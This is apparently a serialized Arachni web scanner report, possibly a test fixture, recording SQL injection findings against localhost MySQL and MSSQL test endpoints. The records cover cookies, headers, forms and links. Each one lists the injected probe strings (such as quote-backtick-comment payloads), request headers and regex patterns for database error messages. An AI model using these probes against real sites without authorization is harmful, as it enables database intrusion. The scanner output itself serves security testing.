tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: cookie2 url: http://localhost:7362/mysql/cookie/append elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:supplied argument is not a valid MySQL) :match: supplied argument is not a valid MySQL :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ) :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value) :injected: cookie value) :combo: !binary "Y29va2llMg==": cookie value) :action: http://localhost:7362/mysql/cookie/append :verification: :id: supplied argument is not a valid MySQL var: cookie2 url: http://localhost:7362/mysql/cookie/append injected: cookie value) id: supplied argument is not a valid MySQL regexp: (?i-mx:supplied argument is not a valid MySQL) regexp_match: supplied argument is not a valid MySQL elem: cookie remarks: {} method: GET response: ! 
'supplied argument is not a valid MySQL Column count doesn''t match value count at row mysql_fetch_array() on MySQL result index You have an error in your SQL syntax; You have an error in your SQL syntax near MySQL server version for the right syntax to use [MySQL][ODBC Column count doesn''t match Table ''Stuff'' doesn''t exist SQL syntax stuff MySQL Warning stuff mysql_ valid MySQL result ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value) response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mzg3 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzozOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/mysql/cookie/flip elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:supplied argument is not a valid MySQL) :match: supplied argument is not a valid MySQL :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ) :altered: Parameter flip :element: cookie :params: {} :follow_location: true :cookies: ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: 
http://localhost:7362/mysql/cookie/flip :verification: :id: supplied argument is not a valid MySQL var: Parameter flip url: http://localhost:7362/mysql/cookie/flip injected: '' id: supplied argument is not a valid MySQL regexp: (?i-mx:supplied argument is not a valid MySQL) regexp_match: supplied argument is not a valid MySQL elem: cookie remarks: {} method: GET response: ! '[nil, "supplied argument is not a valid MySQL\nColumn count doesn''t match value count at row\nmysql_fetch_array()\non MySQL result index\nYou have an error in your SQL syntax;\nYou have an error in your SQL syntax near\nMySQL server version for the right syntax to use\n[MySQL][ODBC\nColumn count doesn''t match\nTable ''Stuff'' doesn''t exist\nSQL syntax stuff MySQL\nWarning stuff mysql_\nvalid MySQL result\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;)=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NDA5 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzozOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/mysql/header/flip elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:supplied argument is not a valid MySQL) :match: supplied argument is not a valid MySQL :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: Parameter flip :element: header :params: :follow_location: true :headers: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ! 
'''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/mysql/header/flip :verification: :id: supplied argument is not a valid MySQL var: Parameter flip url: http://localhost:7362/mysql/header/flip injected: '' id: supplied argument is not a valid MySQL regexp: (?i-mx:supplied argument is not a valid MySQL) regexp_match: supplied argument is not a valid MySQL elem: header remarks: {} method: GET response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, "supplied argument is not a valid MySQL\nColumn count doesn''t match value count at row\nmysql_fetch_array()\non MySQL result index\nYou have an error in your SQL syntax;\nYou have an error in your SQL syntax near\nMySQL server version for the right syntax to use\n[MySQL][ODBC\nColumn count doesn''t match\nTable ''Stuff'' doesn''t exist\nSQL syntax stuff MySQL\nWarning stuff mysql_\nvalid MySQL result\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev ! '''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NTU0 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzo1NCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. 
tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: User-Agent url: http://localhost:7362/mysql/header/append elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:supplied argument is not a valid MySQL) :match: supplied argument is not a valid MySQL :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! 
'''`--' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user'`-- :injected: arachni_user'`-- :combo: User-Agent: arachni_user'`-- :action: http://localhost:7362/mysql/header/append :verification: :id: supplied argument is not a valid MySQL var: User-Agent url: http://localhost:7362/mysql/header/append injected: arachni_user'`-- id: supplied argument is not a valid MySQL regexp: (?i-mx:supplied argument is not a valid MySQL) regexp_match: supplied argument is not a valid MySQL elem: header remarks: {} method: GET response: ! 'supplied argument is not a valid MySQL Column count doesn''t match value count at row mysql_fetch_array() on MySQL result index You have an error in your SQL syntax; You have an error in your SQL syntax near MySQL server version for the right syntax to use [MySQL][ODBC Column count doesn''t match Table ''Stuff'' doesn''t exist SQL syntax stuff MySQL Warning stuff mysql_ valid MySQL result ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user'`-- Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mzg3 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzo1OCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/mssql/form/append elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:System\.Data\.OleDb\.OleDbException) :match: System.Data.OleDb.OleDbException :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ) :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default) :follow_location: true :injected: default) :combo: !binary "aW5wdXQ=": default) :action: http://localhost:7362/mssql/form/append :verification: :id: System.Data.OleDb.OleDbException var: 
input url: http://localhost:7362/mssql/form/append injected: default) id: System.Data.OleDb.OleDbException regexp: (?i-mx:System\.Data\.OleDb\.OleDbException) regexp_match: System.Data.OleDb.OleDbException elem: form remarks: {} method: GET response: ! 'System.Data.OleDb.OleDbException [Microsoft][ODBC SQL Server Driver] [SQLServer JDBC Driver] [SqlException System.Data.SqlClient.SqlException Unclosed quotation mark after the character string ''80040e14'' mssql_query() Microsoft OLE DB Provider for ODBC Drivers Microsoft OLE DB Provider for SQL Server Incorrect syntax near Sintaxis incorrecta cerca de Syntax error in string in query expression Procedure or function ''ColumnSeek'' expects parameter Unclosed quotation mark before the character string Syntax Error (missing operator) in query expression Data type mismatch in criteria expression ADODB.Field (0x800A0BCD) [Microsoft][ODBC Microsoft Access Driver] the used select statements have different number of columns OLE DB stuff SQL Server Warningstuff mssql_ Access stuff Driver Driver stuff Access JET Database Engine Access Database Engine ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- ODQ5 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDowMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. 
tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/mssql/form/flip elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:System\.Data\.OleDb\.OleDbException) :match: System.Data.OleDb.OleDbException :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ) :altered: Parameter flip :element: form :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/mssql/form/flip :verification: :id: System.Data.OleDb.OleDbException var: Parameter flip url: http://localhost:7362/mssql/form/flip injected: '' id: System.Data.OleDb.OleDbException regexp: (?i-mx:System\.Data\.OleDb\.OleDbException) regexp_match: System.Data.OleDb.OleDbException elem: form remarks: {} method: GET response: ! 
'["System.Data.OleDb.OleDbException\n[Microsoft][ODBC SQL Server Driver]\n[SQLServer JDBC Driver]\n[SqlException\nSystem.Data.SqlClient.SqlException\nUnclosed quotation mark after the character string\n''80040e14''\nmssql_query()\nMicrosoft OLE DB Provider for ODBC Drivers\nMicrosoft OLE DB Provider for SQL Server\nIncorrect syntax near\nSintaxis incorrecta cerca de\nSyntax error in string in query expression\nProcedure or function ''ColumnSeek'' expects parameter\nUnclosed quotation mark before the character string\nSyntax Error (missing operator) in query expression\nData type mismatch in criteria expression\nADODB.Field (0x800A0BCD)\n[Microsoft][ODBC Microsoft Access Driver]\nthe used select statements have different number of columns\nOLE DB stuff SQL Server\nWarningstuff mssql_\nAccess stuff Driver\nDriver stuff Access\nJET Database Engine\nAccess Database Engine\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- ODg0 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDowMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/mssql/link/append?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:System\.Data\.OleDb\.OleDbException) :match: System.Data.OleDb.OleDbException :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ) :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default) :follow_location: true :injected: default) :combo: !binary "aW5wdXQ=": default) :action: http://localhost:7362/mssql/link/append?input=default :verification: :id: System.Data.OleDb.OleDbException var: input url: http://localhost:7362/mssql/link/append?input=default 
injected: default) id: System.Data.OleDb.OleDbException regexp: (?i-mx:System\.Data\.OleDb\.OleDbException) regexp_match: System.Data.OleDb.OleDbException elem: link remarks: {} method: GET response: ! 'System.Data.OleDb.OleDbException [Microsoft][ODBC SQL Server Driver] [SQLServer JDBC Driver] [SqlException System.Data.SqlClient.SqlException Unclosed quotation mark after the character string ''80040e14'' mssql_query() Microsoft OLE DB Provider for ODBC Drivers Microsoft OLE DB Provider for SQL Server Incorrect syntax near Sintaxis incorrecta cerca de Syntax error in string in query expression Procedure or function ''ColumnSeek'' expects parameter Unclosed quotation mark before the character string Syntax Error (missing operator) in query expression Data type mismatch in criteria expression ADODB.Field (0x800A0BCD) [Microsoft][ODBC Microsoft Access Driver] the used select statements have different number of columns OLE DB stuff SQL Server Warningstuff mssql_ Access stuff Driver Driver stuff Access JET Database Engine Access Database Engine ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- ODQ5 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDowNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/mssql/link/flip?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:System\.Data\.OleDb\.OleDbException) :match: System.Data.OleDb.OleDbException :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ) :altered: Parameter flip :element: link :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary 
